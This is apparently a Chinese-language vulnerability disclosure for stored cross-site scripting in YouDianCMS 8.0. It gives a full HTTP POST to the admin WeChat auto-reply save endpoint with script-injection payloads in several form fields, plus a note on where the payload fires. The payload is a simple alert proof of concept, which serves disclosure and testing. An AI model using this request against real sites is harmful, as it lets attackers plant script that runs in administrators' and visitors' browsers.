YouDianCMS 8.0 Storeage XSS

一、漏洞简介

二、漏洞影响

YouDianCMS 8.0

三、复现过程

POST /index.php/Admin/wx/saveSubscribeReply 
HTTP/1.1 Host: 127.0.0.1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 
Accept: application/json, text/javascript, /; q=0.01 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Referer: http://0-sec.org/index.php/Admin/Wx/subscribereply/l/en/random/1560696407129 
X-Requested-With: XMLHttpRequest 
Content-Type: multipart/form-data; 
boundary=---------------------------17443203555821 
Content-Length: 2207 
DNT: 1 
Connection: close 
Cookie: PHPSESSID=bkv171om25ji6a51t7dql010h2; youdianAdminLangSet=en; CKFinder_Path=Files%3A%2F%3A1; CKFinder_Settings=TNNDS; youdianMenuTopID=15

-----------------------------17443203555821 Content-Disposition: form-data; name="ReplyID"

1 -----------------------------17443203555821 Content-Disposition: form-data; name="TypeID"

1 -----------------------------17443203555821 Content-Disposition: form-data; name="a1"

"><scRIPT>alert(1)</SCRIPT> -----------------------------17443203555821 Content-Disposition: form-data; name="a2"

2 -----------------------------17443203555821 Content-Disposition: form-data; name="a3"

1 -----------------------------17443203555821 Content-Disposition: form-data; name="a4"

"><scRIPT>alert(1)</SCRIPT> -----------------------------17443203555821 Content-Disposition: form-data; name="a5"

1 -----------------------------17443203555821 Content-Disposition: form-data; name="a6"

-----------------------------17443203555821 Content-Disposition: form-data; name="musicfile"

-----------------------------17443203555821 Content-Disposition: form-data; name="a11"

-----------------------------17443203555821 Content-Disposition: form-data; name="a12"

1 -----------------------------17443203555821 Content-Disposition: form-data; name="a13"

-----------------------------17443203555821 Content-Disposition: form-data; name="a14"

-----------------------------17443203555821 Content-Disposition: form-data; name="a15"

"><scRIPT>alert(1)</SCRIPT> -----------------------------17443203555821 Content-Disposition: form-data; name="a16"

1 -----------------------------17443203555821 Content-Disposition: form-data; name="a7"

2 -----------------------------17443203555821 Content-Disposition: form-data; name="a8"

2,大转盘 -----------------------------17443203555821 Content-Disposition: form-data; name="a10"

-----------------------------17443203555821 Content-Disposition: form-data; name="a9"

"><scRIPT>alert(1)</SCRIPT> -----------------------------17443203555821 Content-Disposition: form-data; name="IsEnable"

1 -----------------------------17443203555821 Content-Disposition: form-data; name="hash"

19b37a0a1054dfd209b9a17c704027f3_db90bddc24f4e98592b355e2cbbca612 -----------------------------17443203555821--

该漏洞触发的位置在"微信平台"-"自动回复"-"跟踪自动回复"的"微信短信"中,最后点击保存触发。

四、参考链接

https://github.com/ReboOt68/youdiancms8.0-StoreageXSS-POC/issues/2